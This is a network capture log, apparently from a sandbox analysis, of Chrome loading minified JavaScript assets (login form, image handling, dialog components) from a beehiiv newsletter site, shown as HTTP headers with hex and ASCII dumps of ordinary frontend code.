                                                                                                                                            2025-01-15 18:14:36 UTC468INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 32 65 30 30 32 66 39 34 2d 62 39 38 35 2d 35 31 64 36 2d 62 36 61 37 2d 39 63 30 32 31 62 31 37 33 37 37 39 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="2e002f94-b985-51d6-b6a7-9c021b173779")}catch(
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 44 4b 34 32 75 46 30 37 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 42 20 61 73 20 62 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 45 7a 76 71 4c 59 39 32 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 49 20 61 73 20 75 7d 66 72 6f 6d 22 2e 2f 49 6e 70 75 74 2d 73 6e 4d 53 70 63 33 6f 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 53 20 61 73 20 5f 7d 66 72 6f 6d 22 2e 2f 53 74 61 74 75 73 49 6e 70 75 74 73 2d 4a 6b 56 68 6b 5f 6a 67 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 78 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 72 61 6e 73 6c 61 74 69 6f 6e 2d 43 66 4b 4a 41 6d 47 59 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 52 20 61 73 20 79 7d 66 72 6f 6d 22 2e 2f 52 65 64 69 72 65 63 74 54 6f 48 69 64 64 65 6e 49 6e 70 75 74 2d 6d 55 62 34 79 69 69 37 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 63 20 61
                                                                                                                                            Data Ascii: DK42uF07.js";import{B as b}from"./index-EzvqLY92.js";import{I as u}from"./Input-snMSpc3o.js";import{S as _}from"./StatusInputs-JkVhk_jg.js";import{u as x}from"./useTranslation-CfKJAmGY.js";import{R as y}from"./RedirectToHiddenInput-mUb4yii7.js";import{c a
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 6d 65 3a 22 70 61 73 73 77 6f 72 64 22 2c 74 79 70 65 3a 22 70 61 73 73 77 6f 72 64 22 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 73 28 22 6c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 5f 70 6c 61 63 65 68 6f 6c 64 65 72 22 29 2c 6c 61 62 65 6c 3a 73 28 22 6c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 5f 6c 61 62 65 6c 22 29 2c 72 65 71 75 69 72 65 64 3a 21 6c 7d 29 2c 65 2e 6a 73 78 73 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 77 2d 66 75 6c 6c 20 66 6c 65 78 2d 63 6f 6c 20 69 74 65 6d 73 2d 65 6e 64 20 67 61 70 2d 79 2d 31 20 73 6d 3a 66 6c 65 78 2d 72 6f 77 2d 72 65 76 65 72 73 65 20 73 6d 3a 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 73 6d 3a 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 6c 3f 6e 75 6c
                                                                                                                                            Data Ascii: me:"password",type:"password",placeholder:s("login.password_placeholder"),label:s("login.password_label"),required:!l}),e.jsxs("div",{className:"flex w-full flex-col items-end gap-y-1 sm:flex-row-reverse sm:items-center sm:justify-between",children:[l?nul
                                                                                                                                            2025-01-15 18:14:36 UTC452INData Raw: 7d 29 2c 65 2e 6a 73 78 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 73 28 61 2c 7b 61 73 3a 22 70 22 2c 73 69 7a 65 3a 22 78 73 22 2c 74 79 70 65 3a 22 62 6f 64 79 22 2c 74 68 65 6d 65 3a 22 64 65 66 61 75 6c 74 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 74 28 22 6c 6f 67 69 6e 2e 73 69 67 6e 5f 75 70 5f 6c 61 62 65 6c 22 29 2c 22 20 22 2c 65 2e 6a 73 78 28 4e 2c 7b 74 6f 3a 22 2f 73 75 62 73 63 72 69 62 65 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 75 6e 64 65 72 6c 69 6e 65 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 28 61 2c 7b 61 73 3a 22 73 70 61 6e 22 2c 73 69 7a 65 3a 22 78 73 22 2c 74 79 70 65 3a 22 62 6f 64 79 22 2c 77 65 69 67 68 74 3a 22 62 6f 6c 64 22
                                                                                                                                            Data Ascii: }),e.jsx("div",{className:"flex flex-col",children:e.jsxs(a,{as:"p",size:"xs",type:"body",theme:"default",children:[t("login.sign_up_label")," ",e.jsx(N,{to:"/subscribe",className:"underline",children:e.jsx(a,{as:"span",size:"xs",type:"body",weight:"bold"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            85192.168.2.1649812104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:36 UTC550OUTGET /assets/Image-ycA_AFLr.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC901INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1492
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"5d4-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b0daa842a9-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC468INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 63 35 31 36 34 33 32 38 2d 61 34 33 64 2d 35 66 62 64 2d 62 33 39 31 2d 62 30 39 38 38 61 35 39 65 32 31 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c5164328-a43d-5fbd-b391-b0988a59e21e")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC1024INData Raw: 69 61 2e 62 65 65 68 69 69 76 2e 6e 65 74 22 3a 22 6d 65 64 69 61 2e 62 65 65 68 69 69 76 2e 63 6f 6d 22 2c 22 62 65 65 68 69 69 76 2d 69 6d 61 67 65 73 2d 73 74 61 67 69 6e 67 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 22 3a 22 6d 65 64 69 61 2e 73 74 61 67 69 6e 67 68 69 69 76 2e 63 6f 6d 22 2c 22 73 74 61 67 69 6e 67 2d 6d 65 64 69 61 2e 62 65 65 68 69 69 76 2e 6e 65 74 22 3a 22 6d 65 64 69 61 2e 73 74 61 67 69 6e 67 68 69 69 76 2e 63 6f 6d 22 7d 2c 76 3d 28 69 2c 73 29 3d 3e 7b 6c 65 74 20 65 3d 6e 75 6c 6c 3b 74 72 79 7b 65 3d 6e 65 77 20 55 52 4c 28 69 29 7d 63 61 74 63 68 7b 7d 69 66 28 21 21 21 28 65 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6c 29 2e 69 6e 63 6c 75 64 65 73 28 65 2e 68 6f 73 74 29 29 29 72 65 74 75 72 6e 20 69 3b 63 6f 6e
                                                                                                                                            Data Ascii: ia.beehiiv.net":"media.beehiiv.com","beehiiv-images-staging.s3.amazonaws.com":"media.staginghiiv.com","staging-media.beehiiv.net":"media.staginghiiv.com"},v=(i,s)=>{let e=null;try{e=new URL(i)}catch{}if(!!!(e&&Object.keys(l).includes(e.host)))return i;con


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            86192.168.2.1649811104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:36 UTC551OUTGET /assets/dialog-CtpHvvfD.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC903INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 15043
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"3ac3-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b0d91b4346-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC466INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 64 34 38 64 36 32 33 32 2d 33 64 31 36 2d 35 36 32 38 2d 61 63 66 65 2d 36 64 36 65 33 30 33 38 66 62 38 33 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="d48d6232-3d16-5628-acfe-6d6e3038fb83")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 6d 22 2e 2f 6b 65 79 62 6f 61 72 64 2d 43 61 45 75 32 6f 30 75 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 6e 20 61 73 20 4e 65 2c 73 20 61 73 20 5f 2c 63 20 61 73 20 57 65 2c 45 20 61 73 20 67 65 2c 65 20 61 73 20 59 65 2c 4e 20 61 73 20 55 65 2c 6c 20 61 73 20 4b 2c 74 20 61 73 20 51 7d 66 72 6f 6d 22 2e 2f 75 73 65 2d 72 6f 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 73 2d 44 6d 79 57 46 77 75 6f 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 4f 20 61 73 20 56 2c 4d 20 61 73 20 52 2c 61 20 61 73 20 76 65 2c 79 20 61 73 20 44 2c 4e 20 61 73 20 5f 65 7d 66 72 6f 6d 22 2e 2f 75 73 65 2d 69 73 2d 6d 6f 75 6e 74 65 64 2d 42 61 48 76 31 36 62 42 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 6e 20 61 73 20 68 65 2c 74 20 61 73 20 6a 65 2c 75 20 61 73 20 56 65 2c 64 20 61 73 20 6a 2c 79 20 61 73
                                                                                                                                            Data Ascii: m"./keyboard-CaEu2o0u.js";import{n as Ne,s as _,c as We,E as ge,e as Ye,N as Ue,l as K,t as Q}from"./use-root-containers-DmyWFwuo.js";import{O as V,M as R,a as ve,y as D,N as _e}from"./use-is-mounted-BaHv16bB.js";import{n as he,t as je,u as Ve,d as j,y as
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 77 20 53 65 74 3b 66 6f 72 28 6c 65 74 20 6e 20 6f 66 20 65 2e 63 75 72 72 65 6e 74 29 6e 2e 63 75 72 72 65 6e 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 74 2e 61 64 64 28 6e 2e 63 75 72 72 65 6e 74 29 3b 72 65 74 75 72 6e 20 74 7d 6c 65 74 20 4a 65 3d 22 64 69 76 22 3b 76 61 72 20 77 65 3d 28 65 3d 3e 28 65 5b 65 2e 4e 6f 6e 65 3d 31 5d 3d 22 4e 6f 6e 65 22 2c 65 5b 65 2e 49 6e 69 74 69 61 6c 46 6f 63 75 73 3d 32 5d 3d 22 49 6e 69 74 69 61 6c 46 6f 63 75 73 22 2c 65 5b 65 2e 54 61 62 4c 6f 63 6b 3d 34 5d 3d 22 54 61 62 4c 6f 63 6b 22 2c 65 5b 65 2e 46 6f 63 75 73 4c 6f 63 6b 3d 38 5d 3d 22 46 6f 63 75 73 4c 6f 63 6b 22 2c 65 5b 65 2e 52 65 73 74 6f 72 65 46 6f 63 75 73 3d 31 36 5d 3d 22 52 65 73 74 6f 72 65 46 6f 63 75
                                                                                                                                            Data Ascii: w Set;for(let n of e.current)n.current instanceof HTMLElement&&t.add(n.current);return t}let Je="div";var we=(e=>(e[e.None=1]="None",e[e.InitialFocus=2]="InitialFocus",e[e.TabLock=4]="TabLock",e[e.FocusLock=8]="FocusLock",e[e.RestoreFocus=16]="RestoreFocu
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 61 72 64 22 3a 21 30 2c 6f 6e 46 6f 63 75 73 3a 6b 2c 66 65 61 74 75 72 65 73 3a 63 65 2e 46 6f 63 75 73 61 62 6c 65 7d 29 2c 4f 28 7b 6f 75 72 50 72 6f 70 73 3a 45 2c 74 68 65 69 72 50 72 6f 70 73 3a 61 2c 64 65 66 61 75 6c 74 54 61 67 3a 4a 65 2c 6e 61 6d 65 3a 22 46 6f 63 75 73 54 72 61 70 22 7d 29 2c 21 21 28 69 26 34 29 26 26 66 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 65 2c 7b 61 73 3a 22 62 75 74 74 6f 6e 22 2c 74 79 70 65 3a 22 62 75 74 74 6f 6e 22 2c 22 64 61 74 61 2d 68 65 61 64 6c 65 73 73 75 69 2d 66 6f 63 75 73 2d 67 75 61 72 64 22 3a 21 30 2c 6f 6e 46 6f 63 75 73 3a 6b 2c 66 65 61 74 75 72 65 73 3a 63 65 2e 46 6f 63 75 73 61 62 6c 65 7d 29 29 7d 6c 65 74 20 51 65 3d 50 28 4b 65 29 2c 4d 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 51
                                                                                                                                            Data Ascii: ard":!0,onFocus:k,features:ce.Focusable}),O({ourProps:E,theirProps:a,defaultTag:Je,name:"FocusTrap"}),!!(i&4)&&f.createElement(se,{as:"button",type:"button","data-headlessui-focus-guard":!0,onFocus:k,features:ce.Focusable}))}let Qe=P(Ke),M=Object.assign(Q
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 3f 79 65 28 61 2c 70 29 3f 28 72 2e 63 75 72 72 65 6e 74 3d 70 2c 44 28 70 29 29 3a 28 69 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 69 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 44 28 75 29 29 3a 44 28 72 2e 63 75 72 72 65 6e 74 29 7d 2c 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 2c 74 29 7b 66 6f 72 28 6c 65 74 20 6e 20 6f 66 20 65 29 69 66 28 6e 2e 63 6f 6e 74 61 69 6e 73 28 74 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 72 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 65 21 3d 3d 30 7c 7c 31 2f 65 3d 3d 3d 31 2f 74 29 7c 7c 65 21 3d 3d 65 26 26 74 21 3d 3d 74 7d 63 6f 6e 73 74 20 6f 74 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 69 73 3d 3d 22 66 75 6e 63
                                                                                                                                            Data Ascii: ?ye(a,p)?(r.current=p,D(p)):(i.preventDefault(),i.stopPropagation(),D(u)):D(r.current)},!0)}function ye(e,t){for(let n of e)if(n.contains(t))return!0;return!1}function rt(e,t){return e===t&&(e!==0||1/e===1/t)||e!==e&&t!==t}const ot=typeof Object.is=="func
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 74 28 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 7b 62 65 66 6f 72 65 28 7b 64 6f 63 3a 65 2c 64 3a 74 2c 6d 65 74 61 3a 6e 7d 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 6f 29 7b 72 65 74 75 72 6e 20 6e 2e 63 6f 6e 74 61 69 6e 65 72 73 2e 66 6c 61 74 4d 61 70 28 6c 3d 3e 6c 28 29 29 2e 73 6f 6d 65 28 6c 3d 3e 6c 2e 63 6f 6e 74 61 69 6e 73 28 6f 29 29 7d 74 2e 6d 69 63 72 6f 54 61 73 6b 28 28 29 3d 3e 7b 76 61 72 20 6f 3b 69 66 28 77 69 6e 64 6f 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 2e 73 63 72 6f 6c 6c 42 65 68 61 76 69 6f 72 21 3d 3d 22 61 75 74 6f 22 29 7b 6c 65 74 20 61 3d 6d 65 28 29 3b 61 2e 73 74 79 6c 65 28 65 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 22 73 63 72 6f 6c 6c
                                                                                                                                            Data Ascii: t(){return je()?{before({doc:e,d:t,meta:n}){function r(o){return n.containers.flatMap(l=>l()).some(l=>l.contains(o))}t.microTask(()=>{var o;if(window.getComputedStyle(e.documentElement).scrollBehavior!=="auto"){let a=me();a.style(e.documentElement,"scroll
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 22 6f 76 65 72 66 6c 6f 77 22 2c 22 68 69 64 64 65 6e 22 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 6c 65 74 20 74 3d 7b 7d 3b 66 6f 72 28 6c 65 74 20 6e 20 6f 66 20 65 29 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2c 6e 28 74 29 29 3b 72 65 74 75 72 6e 20 74 7d 6c 65 74 20 4c 3d 76 74 28 28 29 3d 3e 6e 65 77 20 4d 61 70 2c 7b 50 55 53 48 28 65 2c 74 29 7b 76 61 72 20 6e 3b 6c 65 74 20 72 3d 28 6e 3d 74 68 69 73 2e 67 65 74 28 65 29 29 21 3d 6e 75 6c 6c 3f 6e 3a 7b 64 6f 63 3a 65 2c 63 6f 75 6e 74 3a 30 2c 64 3a 6d 65 28 29 2c 6d 65 74 61 3a 6e 65 77 20 53 65 74 7d 3b 72 65 74 75 72 6e 20 72 2e 63 6f 75 6e 74 2b 2b 2c 72 2e 6d 65 74 61 2e 61 64 64 28 74 29 2c 74 68 69 73 2e 73 65 74 28 65 2c 72 29 2c 74
                                                                                                                                            Data Ascii: mentElement,"overflow","hidden")}}}function yt(e){let t={};for(let n of e)Object.assign(t,n(t));return t}let L=vt(()=>new Map,{PUSH(e,t){var n;let r=(n=this.get(e))!=null?n:{doc:e,count:0,d:me(),meta:new Set};return r.count++,r.meta.add(t),this.set(e,r),t
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 2c 58 2e 64 65 6c 65 74 65 28 72 29 29 7d 6c 65 74 20 6c 3d 28 6e 3d 46 2e 67 65 74 28 72 29 29 21 3d 6e 75 6c 6c 3f 6e 3a 30 3b 72 65 74 75 72 6e 20 46 2e 73 65 74 28 72 2c 6c 2b 31 29 2c 6c 21 3d 3d 30 7c 7c 28 58 2e 73 65 74 28 72 2c 7b 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 72 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 29 2c 69 6e 65 72 74 3a 72 2e 69 6e 65 72 74 7d 29 2c 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 2c 22 74 72 75 65 22 29 2c 72 2e 69 6e 65 72 74 3d 21 30 29 2c 6f 7d 2c 5b 65 2c 74 5d 29 7d 6c 65 74 20 6e 65 3d 73 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 28 29 3d 3e 7b 7d 29 3b 6e 65 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 53 74 61 63 6b 43 6f 6e 74
                                                                                                                                            Data Ascii: ,X.delete(r))}let l=(n=F.get(r))!=null?n:0;return F.set(r,l+1),l!==0||(X.set(r,{"aria-hidden":r.getAttribute("aria-hidden"),inert:r.inert}),r.setAttribute("aria-hidden","true"),r.inert=!0),o},[e,t])}let ne=s.createContext(()=>{});ne.displayName="StackCont
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 78 3d 73 2e 75 73 65 52 65 66 28 21 31 29 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 22 64 69 61 6c 6f 67 22 7c 7c 61 3d 3d 3d 22 61 6c 65 72 74 64 69 61 6c 6f 67 22 3f 61 3a 28 78 2e 63 75 72 72 65 6e 74 7c 7c 28 78 2e 63 75 72 72 65 6e 74 3d 21 30 2c 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 60 49 6e 76 61 6c 69 64 20 72 6f 6c 65 20 5b 24 7b 61 7d 5d 20 70 61 73 73 65 64 20 74 6f 20 3c 44 69 61 6c 6f 67 20 2f 3e 2e 20 4f 6e 6c 79 20 5c 60 64 69 61 6c 6f 67 5c 60 20 61 6e 64 20 61 6e 64 20 5c 60 61 6c 65 72 74 64 69 61 6c 6f 67 5c 60 20 61 72 65 20 73 75 70 70 6f 72 74 65 64 2e 20 55 73 69 6e 67 20 5c 60 64 69 61 6c 6f 67 5c 60 20 69 6e 73 74 65 61 64 2e 60 29 29 2c 22 64 69 61 6c 6f 67 22 29 7d 28 29 3b 6c 65 74 20 77 3d 56
                                                                                                                                            Data Ascii: x=s.useRef(!1);a=function(){return a==="dialog"||a==="alertdialog"?a:(x.current||(x.current=!0,console.warn(`Invalid role [${a}] passed to <Dialog />. Only \`dialog\` and and \`alertdialog\` are supported. Using \`dialog\` instead.`)),"dialog")}();let w=V
